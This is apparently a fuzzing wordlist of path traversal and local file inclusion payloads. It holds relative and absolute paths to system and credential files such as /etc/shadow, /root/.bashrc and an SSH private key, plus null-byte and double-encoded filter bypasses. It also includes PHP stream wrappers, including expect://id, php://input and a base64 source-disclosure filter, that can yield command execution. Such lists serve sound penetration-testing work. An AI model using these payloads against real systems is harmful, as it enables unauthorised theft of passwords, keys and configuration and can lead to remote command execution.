../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
/etc/passwd
/proc/self/environ
/proc/self/cmdline
/etc/hosts
/etc/shadow
/etc/issue
/windows/win.ini
/windows/system32/drivers/etc/hosts
/boot.ini
/etc/apache2/apache2.conf
/var/www/html/index.php
/etc/nginx/nginx.conf
/proc/version
/etc/profile
/root/.bashrc
/home/user/.ssh/id_rsa
/etc/passwd%00
/etc/passwd%252f
/var/log/apache2/access.log
/windows/system32/config/system
/etc/group
php://filter/convert.base64-encode/resource=/etc/passwd
expect://id
php://input
../../../etc/passwd%00
../../../../etc/passwd%00
/etc/passwd\0
/etc/passwd%00.jpg
/etc/passwd%00.png
/etc/passwd%00.txt
/etc/passwd%00.pdf
/etc/passwd%00.html
/etc/passwd%00.js
/etc/passwd%00.css
